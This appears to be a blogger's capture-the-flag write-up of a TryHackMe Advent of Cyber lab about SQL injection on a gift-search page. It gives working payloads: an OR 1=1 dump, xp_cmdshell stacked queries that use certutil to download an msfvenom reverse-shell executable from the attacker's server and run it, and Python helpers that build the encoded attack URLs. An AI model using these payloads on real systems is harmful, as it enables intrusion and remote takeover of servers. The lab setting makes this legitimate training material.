Room: Advent of Cyber 2023 Day 10
Hacking back into your own server. 😂🤷♂️
Hacking is mostly seen as something negative by most people. I like the idea of a red team hacking back into their own servers and closing the door behind them: fighting back against the attacker with their own weapons.
Also, I figured out how to make a reverse shell from a VirtualBox VM on my personal PC for the first time. Doing it through the AttackBox always worked like a charm, but I could never figure out how to do it from my own VirtualBox VM. So after the challenge I'll go into what went wrong there in the past.
Another thing I bumped into was Apple copy/pasting ' into ’, which results in invalid SQL. I have no idea what that is all about.
I really like the effort they put into defacing the website 😂
Clicking this link will take you to the URL, which is the answer to Task 1
To see how the search form hands its input to the PHP backend, fill in something random and press Search; the value ends up in the age parameter of the giftresults.php URL.
Tampering with that age value in the URL returns a SQL error message on the screen. Anything that breaks the syntax of the query will do, a single quote is enough, which tells us the input is concatenated into the SQL statement without escaping 🙃
http://10.10.149.18/giftresults.php?age=' OR 1=1 --
This injection turns the WHERE clause into age = '' OR 1=1, which is true for every row, and the trailing -- comments out the rest of the original query (including its closing quote). The result is the whole table dumped onto the page; the flag is the last entry.
For the remaining tasks we need to look around on the system that hosts the website, meaning we need a reverse shell: the meat and potatoes of this challenge.
The end goal is a stacked query that calls xp_cmdshell, the SQL Server procedure that runs an operating-system command, to launch a reverse shell we have placed on the box. xp_cmdshell is disabled by default, so this only works because the site's database login is allowed to use it:
http://MACHINE_IP/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe'; --
Open two terminals on your attacking machine: one for a web server on port 8000 that will serve reverse.exe to the target, and one for a netcat listener on port 4444 that will catch the shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP.ADDRESS.HERE LPORT=4444 -f exe -o reverse.exe
This creates reverse.exe, a Windows executable that connects back to LHOST:LPORT and hands the listener a command shell. LHOST has to be an address the target can actually reach (more on that at the end).
First make the database server pull reverse.exe from your HTTP server with certutil (a signed Windows binary that is commonly abused as a downloader) and save it to C:\Windows\Temp:
http://MACHINE_IP/giftresults.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://YOUR.IP.ADDRESS.HERE:8000/reverse.exe C:\Windows\Temp\reverse.exe'; --
Then run it:
http://MACHINE_IP/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe'; --
At this point you should be in!
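The URLs above are easy to get wrong by hand: the quotes must be straight ASCII apostrophes (the smart-quote problem mentioned at the top of the post), the comment marker must be two hyphens and not a dash, and the value has to survive percent-encoding. The following is an added example written for this writeup, not code from the room or from TryHackMe: it normalises typographic characters, builds and round-trips the encoded URLs for every payload used above, and shows why the trailing -- is needed. The path /giftresults.php and the age parameter are the room's; the target host, LHOST, the HTTP port and the table name in injected_query() are placeholders and assumptions.

```python
"""Build the giftresults.php injection URLs with correctly encoded ASCII punctuation.

Added example for this writeup, not code from the room or from TryHackMe.
The path /giftresults.php and the age parameter are the ones used above; the
target host, LHOST and the HTTP port are placeholders, and the server-side
query in injected_query() is an assumed shape, not the room's real source.
"""
from urllib.parse import parse_qs, quote, urlsplit

# Characters that word processors and some clipboards substitute for the ASCII
# ones SQL needs: the smart quotes from the start of the post, plus the dashes
# that blog platforms make out of "--".
TYPOGRAPHIC = {
    "\u2018": "'",   # left single quote
    "\u2019": "'",   # right single quote
    "\u201c": '"',   # left double quote
    "\u201d": '"',   # right double quote
    "\u2014": "--",  # em dash
    "\u2013": "--",  # en dash
}


def normalise(payload: str) -> str:
    """Replace typographic quotes and dashes with their ASCII equivalents."""
    for bad, good in TYPOGRAPHIC.items():
        payload = payload.replace(bad, good)
    return payload


def non_ascii(payload: str) -> list[str]:
    """Characters above 0x7F still present in payload; an empty list is what you want."""
    return sorted({c for c in payload if ord(c) > 0x7F})


def build_url(target: str, age: str) -> str:
    """Normalise the injected value, percent-encode it and attach it to giftresults.php."""
    # safe="" encodes everything except unreserved characters, so ' ; = : \ and
    # spaces reach the server exactly as typed instead of depending on what the
    # browser decides to do with them.
    encoded = quote(normalise(age), safe="")
    return f"http://{target}/giftresults.php?age={encoded}"


def age_from_url(url: str) -> str:
    """Recover the decoded age value from a built URL (round-trip check)."""
    return parse_qs(urlsplit(url).query)["age"][0]


def injected_query(age: str) -> str:
    """Statement the server would run if it concatenates age into a query of
    this assumed shape; the table name gifts is hypothetical."""
    return f"SELECT * FROM gifts WHERE age = '{age}'"


def mssql_payloads(lhost: str, http_port: int = 8000) -> dict[str, str]:
    """The age values used in the writeup, in the order they are used.

    The trailing -- matters: without it the original query's closing quote is
    left dangling, SQL Server rejects the whole batch at parse time, and none
    of the stacked statements run.
    """
    exe = r"C:\Windows\Temp\reverse.exe"
    return {
        "probe": "'",                # unbalanced quote -> SQL error on the page
        "dump": "' OR 1=1 --",       # WHERE clause is true for every row
        "download": (
            f"'; EXEC xp_cmdshell 'certutil -urlcache -f "
            f"http://{lhost}:{http_port}/reverse.exe {exe}'; --"
        ),
        "execute": f"'; EXEC xp_cmdshell '{exe}'; --",
    }


if __name__ == "__main__":
    for name, age in mssql_payloads("10.9.1.23").items():
        print(f"{name:9} {build_url('MACHINE_IP', age)}")
        print(f"          -> {injected_query(age)}")
```

Run it and paste the printed URLs into the browser, or feed them to curl; non_ascii() is the quick check to run on anything copied from a document before sending it, since a single ’ in place of ' turns a working payload into a syntax error.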
Notice the HTTP server logged a few GET requests; those were the target fetching reverse.exe via certutil.
And the netcat listener picked up the reverse shell, now showing a Windows command prompt: that of the website's machine!
Looking around on the machine, we find a note.txt file in the Desktop folder, the folder where everyone stores their temporary stuff and then never deletes it. 😅
In the note.txt file we find the answer to Task 4, and quite a bit more than just that.
It seems the attacker left behind a batch script that restores the website to how it was before the defacement!
Executing restore_website.bat restores the website to its original content.
Checking out the restored website, we find the answer to Task 5.
I really like the command TryHackMe provided to find the IP address of the AttackBox, which we need both as LHOST in the reverse shell payload and as the address the target downloads it from:
ifconfig ens5 | grep -oP 'inet \K[\d.]+'
However, my machine did not have an “ens5” interface, so I could not find the IP I should be using.
When asking a colleague about this, he made the point that a VirtualBox VM creates its own network, completely separating it from your physical machine. If you are logged in to the THM VPN on the host, it does not matter: the two machines have separate networks.
The solution is quite simple: connect to the THM OpenVPN server from the Kali Linux VM itself. This adds a “tun0” network interface, whose address is the one to use as LHOST, as displayed in the picture below.
From there I could do the same as in the AttackBox: spin up the terminals and run the services needed for the reverse shell.
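The interface confusion above (ens5 on the AttackBox, tun0 in a local VM, and the VM's own NAT address that the target can never reach) is easy to automate away. As an added example that is not part of the original post or of TryHackMe's tooling, the script below parses the one-line-per-address output of ip -o -4 addr show, prefers the OpenVPN tunnel over the AttackBox's ens5 and the usual local NIC names, and refuses VirtualBox's default NAT address (10.0.2.x) so that running it before the VPN is up fails loudly instead of producing an unreachable LHOST. The interface names other than tun0 and ens5, and the sample output, are assumptions constructed for the example.

```python
"""Pick the address to use as LHOST when attacking a THM target from a local VM.

Added example for this writeup, not a TryHackMe tool. Parses `ip -o -4 addr show`
output and prefers the OpenVPN tunnel (tun0) over the AttackBox's ens5 and the
names a local Kali VM typically has, because the THM target can only reach a
local VM through the tunnel. Interface names beyond tun0/ens5 are assumptions
and the sample output below is constructed.
"""
import re
import subprocess
from typing import Optional

# Preference order: VPN tunnel first, then the AttackBox's cloud NIC, then the
# names a local Kali VM usually has (assumed).
PREFERRED = ("tun0", "ens5", "eth0", "enp0s3")

# `ip -o -4 addr show` prints one address per line, e.g.
# "3: tun0    inet 10.9.1.23/16 scope global tun0\       valid_lft forever ..."
_LINE = re.compile(r"^\d+:\s+(\S+)\s+inet\s+(\d{1,3}(?:\.\d{1,3}){3})/\d+")


def parse_ip_addr(output: str) -> dict[str, str]:
    """Map interface name -> first IPv4 address for every line that carries one."""
    addrs: dict[str, str] = {}
    for line in output.splitlines():
        m = _LINE.match(line)
        if m:
            addrs.setdefault(m.group(1), m.group(2))
    return addrs


def is_virtualbox_nat(ip: str) -> bool:
    """VirtualBox's default NAT network is 10.0.2.0/24 (the guest gets 10.0.2.15).
    An address there is reachable only from the VM itself, never from the target."""
    return ip.startswith("10.0.2.")


def choose_lhost(addrs: dict[str, str], preferred=PREFERRED) -> Optional[str]:
    """Address on the first preferred interface that is present and is not a
    VirtualBox NAT address; None means nothing usable is up (VPN not connected)."""
    for iface in preferred:
        ip = addrs.get(iface)
        if ip and not is_virtualbox_nat(ip):
            return ip
    return None


def current_lhost() -> Optional[str]:
    """Run ip(8) on this machine and choose from its real output."""
    out = subprocess.run(["ip", "-o", "-4", "addr", "show"],
                         capture_output=True, text=True, check=True).stdout
    return choose_lhost(parse_ip_addr(out))


# Constructed sample: a Kali VM behind VirtualBox NAT with the THM tunnel up.
SAMPLE_VPN_UP = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: eth0    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0\\       valid_lft 86161sec preferred_lft 86161sec
3: tun0    inet 10.9.1.23/16 scope global tun0\\       valid_lft forever preferred_lft forever
"""

# The same VM before connecting to the VPN: only the unreachable NAT address exists.
SAMPLE_VPN_DOWN = "\n".join(SAMPLE_VPN_UP.splitlines()[:2]) + "\n"

if __name__ == "__main__":
    print("VPN up:  ", choose_lhost(parse_ip_addr(SAMPLE_VPN_UP)))    # 10.9.1.23
    print("VPN down:", choose_lhost(parse_ip_addr(SAMPLE_VPN_DOWN)))  # None
```

Feed the result of current_lhost() into the msfvenom LHOST= argument and into the certutil URL; on the AttackBox it resolves to the ens5 address the room's own command prints, and in a local VM it resolves to tun0 or to nothing at all, which is the right time to notice the VPN is not connected.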
In the future I might write something more in depth about how VPNs and networks work, which interfaces they use and how they all talk to each other. Or how they don't! If you're interested in that, let me know!
Happy Hacking!